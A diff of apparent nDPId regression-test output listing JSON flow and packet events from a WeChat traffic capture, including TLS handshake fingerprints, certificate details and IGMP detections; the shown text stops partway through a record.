+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167401063,"flow_last_seen":1492167401063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167401063,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1492167440370,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167440370,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9gAAAEC8bPAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -158,129 +158,129 @@ 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1492167449288,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167449288,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 